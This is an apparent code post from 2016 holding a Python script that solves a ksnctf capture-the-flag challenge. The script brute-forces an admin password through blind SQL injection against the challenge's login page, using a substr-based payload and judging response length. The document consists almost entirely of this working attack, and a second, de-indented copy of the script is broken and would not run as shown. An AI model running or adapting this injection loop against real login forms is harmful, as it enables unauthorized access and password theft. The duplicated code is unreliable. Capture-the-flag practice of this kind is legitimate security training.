staybuzz · July 3, 2016 17:22
diff --git a/ksnctf_06_login.py b/ksnctf_06_login.py
 import requests

 # 送信データの作成． n=>何文字目の文字を調べたいか, s=>何の文字と照合するか
 def create_payload(n,s):
    payload = {"id": "admin", "pass": "' or substr(pass,%d,1) = '%s';--" % (n+1,s)}
    return payload
    
 # [A-Za-z0-9]リスト作成
 alnum = [chr(i) for i in range(65,65+26)]
 for i in range(97,97+26): alnum.append(chr(i))
 for i in range(48,48+10): alnum.append(chr(i))

 url="http://ctfq.sweetduet.info:10080/~q6/"
 password = ''

 # 総当たり開始
 for i in range(4,21):
    print(i)
    for j in range(len(alnum)):
        payload = create_payload(i,alnum[j])
        req = requests.post(url, data=payload)

        if int(req.headers['Content-Length']) > 1000:
            password += alnum[j]
            print(password)
            break

 print("finish.")
 print("FLAG IS FLAG_" + password)
	import requests

	# 送信データの作成． n=>何文字目の文字を調べたいか, s=>何の文字と照合するか
	def create_payload(n,s):
	payload = {"id": "admin", "pass": "' or substr(pass,%d,1) = '%s';--" % (n+1,s)}
	return payload

	# [A-Za-z0-9]リスト作成
	alnum = [chr(i) for i in range(65,65+26)]
	for i in range(97,97+26): alnum.append(chr(i))
	for i in range(48,48+10): alnum.append(chr(i))

	url="http://ctfq.sweetduet.info:10080/~q6/"
	password = ''

	# 総当たり開始
	for i in range(4,21):
	print(i)
	for j in range(len(alnum)):
	payload = create_payload(i,alnum[j])
	req = requests.post(url, data=payload)

	if int(req.headers['Content-Length']) > 1000:
	password += alnum[j]
	print(password)
	break

	print("finish.")
	print("FLAG IS FLAG_" + password)